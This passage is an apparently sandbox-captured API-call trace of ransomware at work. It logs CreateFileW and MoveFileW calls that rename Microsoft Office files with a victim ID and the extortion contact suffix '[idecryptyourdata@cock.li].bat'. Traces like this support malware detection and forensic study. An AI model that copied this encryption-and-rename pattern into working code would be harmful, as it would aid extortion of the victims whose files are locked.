office\\root\\office16\\1033\\reviewrouting_review.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.920] CloseHandle (hObject=0x534) returned 1 [0176.921] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.921] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ROSE.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\rose.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.921] CloseHandle (hObject=0x534) returned 1 [0176.925] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.925] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKY.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sky.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.925] CloseHandle (hObject=0x534) returned 1 [0176.926] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.926] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPRING.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\spring.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.926] CloseHandle (hObject=0x534) returned 1 [0176.930] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.930] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPS.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sps.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.930] CloseHandle (hObject=0x530) returned 1 [0176.931] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.931] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\STEEL.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\steel.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.931] CloseHandle (hObject=0x530) returned 1 [0176.932] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.932] SetFilePointerEx (in: hFile=0x530, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0176.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SUNNY.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\sunny.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0176.987] CloseHandle (hObject=0x530) returned 1 [0177.366] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.367] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\TelemetryLog.xltx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\telemetrylog.xltx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.367] CloseHandle (hObject=0x2cc) returned 1 [0177.367] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.368] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO.CSS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio.css.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.368] CloseHandle (hObject=0x2cc) returned 1 [0177.368] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.368] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDCMPVRD.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdcmpvrd.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.369] CloseHandle (hObject=0x2cc) returned 1 [0177.369] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.369] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Complete.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_complete.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.369] CloseHandle (hObject=0x2cc) returned 1 [0177.370] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.370] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Xlate_Init.xsn.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\xlate_init.xsn.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.370] CloseHandle (hObject=0x2cc) returned 1 [0177.371] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.371] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\CLNTWRAP.HTM.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\clntwrap.htm.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.371] CloseHandle (hObject=0x2cc) returned 1 [0177.372] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.372] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\AccessWeb\\RPT2HTM4.XSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accessweb\\rpt2htm4.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.373] CloseHandle (hObject=0x2cc) returned 1 [0177.375] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.376] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.376] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.377] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.377] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\UTILITY.ACCDA.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\utility.accda.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.377] CloseHandle (hObject=0x2cc) returned 1 [0177.379] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.379] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\MSOSEC.XML.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\msosec.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.379] CloseHandle (hObject=0x2cc) returned 1 [0177.380] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.380] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\BI-Report.png.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bi-report.png.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.380] CloseHandle (hObject=0x2cc) returned 1 [0177.383] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.383] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.383] CloseHandle (hObject=0x2cc) returned 1 [0177.387] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.387] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.387] CloseHandle (hObject=0x2cc) returned 1 [0177.391] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.391] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\LocalizedStrings.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\localizedstrings.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.391] CloseHandle (hObject=0x2cc) returned 1 [0177.393] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.393] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as80.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as80.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.394] CloseHandle (hObject=0x2cc) returned 1 [0177.394] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.395] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as90.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as90.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.395] CloseHandle (hObject=0x2cc) returned 1 [0177.395] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.396] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\db2v0801.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\db2v0801.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.396] CloseHandle (hObject=0x2cc) returned 1 [0177.397] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.397] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\hive.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\hive.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.397] CloseHandle (hObject=0x2cc) returned 1 [0177.398] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.398] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Informix.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\informix.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.398] CloseHandle (hObject=0x2cc) returned 1 [0177.399] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.399] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\msjet.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\msjet.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.399] CloseHandle (hObject=0x2cc) returned 1 [0177.400] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.400] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\orcl7.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\orcl7.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.400] CloseHandle (hObject=0x2cc) returned 1 [0177.401] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.401] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql2000.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql2000.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0177.450] CloseHandle (hObject=0x2cc) returned 1 [0177.956] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.957] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0177.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\sql90.xsl.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sql90.xsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.750] CloseHandle (hObject=0x2dc) returned 1 [0178.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703638 | out: hHeap=0x6a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b418 | out: hHeap=0x6a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3e00978 | out: hHeap=0x6a0000) returned 1 [0178.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3e10980 | out: hHeap=0x6a0000) returned 1 [0178.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x42ac020 | out: hHeap=0x6a0000) returned 1 [0178.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703620 | out: hHeap=0x6a0000) returned 1 [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbe0 [0178.765] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbe0, Size=0x20) returned 0x458c178 [0178.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbe0 [0178.765] 